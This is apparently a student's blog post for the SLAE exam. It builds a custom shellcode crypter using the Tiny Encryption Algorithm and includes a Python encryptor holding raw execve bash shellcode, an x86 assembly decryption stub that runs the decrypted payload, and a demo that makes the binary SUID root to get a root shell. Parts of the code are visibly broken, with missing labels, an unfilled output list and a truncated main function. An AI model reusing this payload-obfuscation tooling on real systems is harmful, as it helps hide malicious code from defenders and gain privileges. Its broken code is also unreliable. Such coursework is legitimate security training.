Custom Shellcode Crypter – SLAE Exam Assignment #7

Assignment #7, and the final assignment, for the SLAE exam is to create a custom shellcode crypter.

Shellcode Crypter – Introduction

First, the requirements for assignment #7 were as follows.

Create a custom crypter like the one shown in the "crypters" video

Free to use any existing encryption scheme

Can use any programming language

In this case, I decided to use assembly as my programming language. This entire course was about assembly, so it felt funny to do the last assignment in another language completely. That said, I did end up writing my encryption script in Python. I originally wrote most of it in Assembly, but realized that it would be obnoxious to handle my printing and modification easily.

Using assembly instead of another language also affords me a few advantages.

  1. In theory, a bit faster and smaller than using another language
  2. More portable than a scripting language
  3. Could be used in an exploit directly, without having to drop a binary on the system

With the decision made, let’s jump into my algorithm choice!

Tiny Encryption Algorithm

Due to my decision to write my decrypter in assembly, I had to find a fairly simple algorithm.

First, I attempted to go with AES, and use the AES-NI instructions. Unfortunately, this proved a little more difficult than I originally planned. Additionally, I wanted my code to work on all processors, even if they didn’t support the instruction set.

After a bit more searching, I stumbled upon the Tiny Encryption Algorithm.

While not the most secure encryption algorithm, it is still decent enough for my use. That, and it is a fairly simple algorithm, taking only 11 lines of C code for the decrypt method.

For more information on the Tiny Encryption Algorithm, I highly recommend the following paper(s).

The XTEA algorithm is a bit more secure, but slightly longer and harder to code. As I wasn’t going for the most secure algorithm, I figured that I would be fine with the original.

For reference, here is the decrypt method that I will be implementing in assembly.

void decrypt (uint32_t* v, uint32_t* k) {
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up */
    uint32_t delta=0x9e3779b9;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i<32; i++) {                         /* basic cycle start */
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        sum -= delta;
    }                                              /* end cycle */
    v[0]=v0; v[1]=v1;

Shellcode Crypter – Encryption Script

With my algorithm selected, it was time to write my encryption script.

As I mentioned before, I started out writing this in assembly as well. That said, when it came time to get my encrypted shellcode and output it cleanly, things got messy.

In that case, I ended up switching to Python.

You can find my script below, and I’ve commented it where necessary. All of the math isn’t in the comments here, but you can find it in the decryption program’s comments.

Also, the numpy uint32/int32 methods definitely saved me when it came to longs and wrapping around. That said, I’m not sure if I’m using them too often or not often enough. The encryption works as expected though, so that’s good enough for me!


import struct
import numpy as np
import warnings

def encrypt(data, key):
    delta = int("0x9e3779b9", 0)
    sum = np.int32(0)

    y = np.uint32(struct.unpack("I", data[0:4])[0])
    z = np.uint32(struct.unpack("I", data[4:8])[0])

    #print "Y: " + str(y)
    #print "Z: " + str(z)

    k0 = struct.unpack("I", key[0:4])[0]
    k1 = struct.unpack("I", key[4:8])[0]
    k2 = struct.unpack("I", key[8:12])[0]
    k3 = struct.unpack("I", key[12:16])[0]

    for n in range(0, 32):
        sum += delta
        sum = np.int32(sum)

        #print "SUM #" + str(n) + ": " + str(sum)

        q = ((z << 4) + k0) ^ (z + sum) ^ ((z >> 5) + k1)

        r = ((z << 4) + k0)
        s = z + sum
        t = ((z >> 5) + k1)

        #print "First sum: " + '0x{:08x}'.format(r % 4294967295)
        #print "Second sum: " + '0x{:08x}'.format(s % 4294967295)
        #print "XOR: " + '0x{:08x}'.format((r ^ s) % 4294967295)
        #print "Second shift: " + '0x{:08x}'.format((z >> 5) % 4294967295)
        #print "Key1: " + '0x{:08x}'.format((k1) % 4294967295)
        #print "Third sum: " + '0x{:08x}'.format((t) % 4294967295)
        #print "Final XOR: " + '0x{:08x}'.format((r ^ s ^ t) % 4294967295)

        y += np.uint32(((z << 4) + k0) ^ (z + sum) ^ ((z >> 5) + k1))
        z += np.uint32(((y << 4) + k2) ^ (y + sum) ^ ((y >> 5) + k3))

    #print "FINAL SUM: " + '0x{:08x}'.format(sum % 4294967295)

    #print '0x{:08x}'.format(y % 4294967295)
    #print '0x{:08x}'.format(z % 4294967295)

    #print k0
    #print k1
    #print k2
    #print k3

    return (y, z)

def main():
    # Execve-stack
    shellcode = "\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
    # Randomly generated key
    key = "WQVh8{7C?gE_B<d$"
    crypted = []
    output = ''

    # Ignore all warnings
    # This is for the overflow occasionally caused by the unsigned integer addition

    # Pad the shellcode length to be divisible by 8, makes encrypting/decrypting easier
    while not (len(shellcode) % 8 == 0):
        shellcode += "\x90"

    # Encrypt each word pair in the shellcode
    for x in range(0, len(shellcode) / 8):
        y, z = encrypt(shellcode[8*x:8*(x+1)], key)
    # Combine the shellcode into a printable string
    for word in crypted:
        output += ''.join(map(lambda c:'\\x%02x'%c, map(ord, struct.pack('L', word))))

    print "\nEncrypted Shellcode"
    print "Length: " + str(len(shellcode)) + " bytes"
    print "--------------------------------"
    print output
    print ""
    print "\nASM ready: \n" + output.replace('\\', ', 0')[2:]

if __name__ == '__main__':

With the script completed, I generated my encrypted shellcode.

[email protected]:~/slae/_exam/crypter$ python 

Encrypted Shellcode
Length: 32 bytes

ASM ready: 
0x32, 0x8d, 0xc9, 0x7c, 0x7a, 0x8a, 0xe7, 0x47, 0x6b, 0x2a, 0x09, 0x6c, 0xe8, 0xcd, 0x32, 0x05, 0x89, 0xa0, 0xc0, 0x1a, 0x59, 0x71, 0x89, 0x4a, 0x06, 0xff, 0x7d, 0xbd, 0xdd, 0x64, 0x15, 0x48

Decryption Program

With my shellcode encrypted, I began writing my decryption program in assembly.

This wasn’t terribly complicated, but definitely took plenty of mental gymnastics. Keeping all of my variables separate, where I wanted them, and saving/retrieving them took some effort. That said, this is probably the assignment I’m most proud of.

I’ve added plenty of comments to the final code, including a line by line description of the math. As this is my full decryption program, I also included the key. That said, in a real world scenario, you definitely wouldn’t want to do this. For example, if you had local access, accepting it via STDIN would be better.

You can find my code below, but feel free to reach out if you have any questions, concerns, or suggestions.

; Filename: tea_decrypt.nasm
; Author: Ray Doyle
; Website:
; Purpose: SLAE Exam Assignment #7 - Custom Shellcode Crypter (Linux/x86) using the Tiny Encryption Algorithm - 148 bytes
; Algorithm:

section .text

global _start

   jmp call_decrypt

   ; JMP-CALL-POP to get EAX pointing to the encrypted shellcode
   pop eax

   ; Point EDX to the decryption key
   lea edx, [eax + 0x21]

   ; Push EAX onto the stack to keep track of where in the shellcode the decryption routine is
   push eax

   ; Move the saved address into EAX
   ; Note that this isn't necessary for the first loop, but doesn't change the functionality
   mov eax, [esp]

   ; Check to see if we're at the end of the shellcode
   ; If so, decryption is complete, so jump to the decrypted shellcode
   cmp byte [eax], 0xAA
   je EncryptedShellcode   

   ; Load the first word of the encrypted shellcode into ESI
   mov esi,[eax]

   ; Load the second word into EDI
   mov edi,[eax+0x4]

   ; Begin the counter for the decrypt loop
   ; Note that 0x9e3779b9 >> 5 = 0xc6ef3720
   mov ecx, 0xc6ef3720

   ; Calculate decrypted word #2 (v1)
   mov ebx,esi
   ; (v0 << 4)
   shl ebx,0x4
   ; (v0 << 4) + k2
   add ebx,[edx+0x8]
   ; (v0 + sum)
   lea eax,[esi+ecx*1]
   ; (v0 << 4) + k2) ^ (v0 + sum)
   xor ebx,eax
   mov eax,esi
   ; (v0 >> 5)
   shr eax,0x5
   ; (v0 >> 5) + k3
   add eax,[edx+0xc]
   ; ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3)
   xor ebx,eax
   ; sum -= delta
   sub edi, ebx

   ; Calculate decrypted word #1 (v0)
   mov ebx,edi
   ; (v1 << 4)
   shl ebx,0x4
   ; (v1 << 4) + k0
   add ebx,[edx]
   ; (v1 + sum)
   lea eax,[edi+ecx*1]
   ; (v1 << 4) + k02) ^ (v1 + sum)
   xor ebx,eax
   mov eax,edi
   ; (v1 >> 5)
   shr eax,0x5
   ; (v1 >> 5) + k1
   add eax,[edx+0x4]
   ; ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1)
   xor ebx,eax
   ; sum -= delta
   sub esi, ebx

   ; Subtract delta from the sum and loop
   ; Note that ECX will only be zero after 32 iterations
   sub ecx, 0x9e3779b9
   jnz decrypt_loop

   ; Retrieve stored EAX from the stack
   pop eax
   ; Replace encrypted shellcode word's with decrypted versions
   mov [eax],esi
   mov [eax+0x4],edi

   ; Add 8 to EAX to begin decrypting the next two words
   add eax, 0x8
   ; Save the modified EAX onto the stack
   push eax
   jmp short decrypt

   call pre_decrypt
   ; Encrypted shellcode + marker byte (0xaa)
   EncryptedShellcode db 0x32, 0x8d, 0xc9, 0x7c, 0x7a, 0x8a, 0xe7, 0x47, 0x6b, 0x2a, 0x09, 0x6c, 0xe8, 0xcd, 0x32, 0x05, 0x89, 0xa0, 0xc0, 0x1a, 0x59, 0x71, 0x89, 0x4a, 0x06, 0xff, 0x7d, 0xbd, 0xdd, 0x64, 0x15, 0x48, 0xAA
   ; Decryption key
   key db "WQVh8{7C?gE_B<d$"

Testing and Execution

With my decryption routine complete, it was time to test everything out.

First, I compiled and linked my assembly.

[email protected]:~/slae/_exam/crypter$ ./ tea_decrypt
[+] Assembling with Nasm ... 
[+] Linking ...
[+] Done!

Next, I obtained the shellcode. Note that I had to use this one-liner or change the old one. The reason for this is that some of the objdump lines contained 7 instructions instead of 6.

[email protected]:~/slae/_exam/crypter$ for i in $(objdump -d tea_decrypt |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo

Finally, I compiled my shellcode wrapper application.

[email protected]:~/slae/_exam/crypter$ vi shellcode.c 
[email protected]:~/slae/_exam/crypter$ gcc -o shellcode -z execstack -fno-stack-protector shellcode.c 

Before running my application, I verified that only one instance of bash was running.

[email protected]:~/slae/_exam/crypter$ ps
  PID TTY          TIME CMD
 4014 pts/6    00:00:01 bash
15170 pts/6    00:00:00 ps

Upon execution, I received a new bash process, and with only 148 bytes of shellcode!

[email protected]:~/slae/_exam/crypter$ ./shellcode
Shellcode Length: 148
[email protected]:/home/doyler/slae/_exam/crypter$ ps
  PID TTY          TIME CMD
 4014 pts/6    00:00:01 bash
15171 pts/6    00:00:00 bash
15227 pts/6    00:00:00 ps
[email protected]:/home/doyler/slae/_exam/crypter$ exit

As an added bonus, I made the binary SUID root for some privilege escalation fun.

[email protected]:~/slae/_exam/crypter$ sudo chown root:root shellcode
[email protected]:~/slae/_exam/crypter$ sudo chmod 4755 shellcode
[email protected]:~/slae/_exam/crypter$ ps
  PID TTY          TIME CMD
 9741 pts/9    00:00:00 bash
13370 pts/9    00:00:00 ps
[email protected]:~/slae/_exam/crypter$ ./shellcode
Shellcode Length: 148
# id
uid=1000(doyler) gid=1000(doyler) euid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(doyler)
# exit

Shellcode Crypter – Conclusion

This was an awesome assignment, and I’m proud of myself for writing the final application in x86 assembly.

I actually found another SLAE student who used the same algorithm. That said, they actually have a bug in their code! The logic for their encryption/decryption is wrong, as you can see below. That said, they used the formula in both directions, so it technically doesn’t matter.

y += (z << 4) + (key[0]^z) + (sum^(z >> 5)) + key[1];
z += (y << 4) + (key[2]^y) + (sum^(y >> 5)) + key[3];

There was also a post about implementing the encryption routine in x86 (AT&T). This helped me organize a few of my registers when I got stuck about halfway through.

Also, while I don’t have the output here, I finally installed PEDA on my SLAE box during this assignment. While not terribly necessary, I needed the vmmap call a few times to make sure that memory was actually writable.

This was a great course, and I look forward to finishing up my review. I also plan on posting some/most/all of my shellcodes to shell-storm and/or Exploit DB, so be on the lookout.

Finally, you can find the code and updates in my GitHub repository.

SLAE Exam Requirement

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification:

Student-ID: SLAE-1212

Leave a Comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.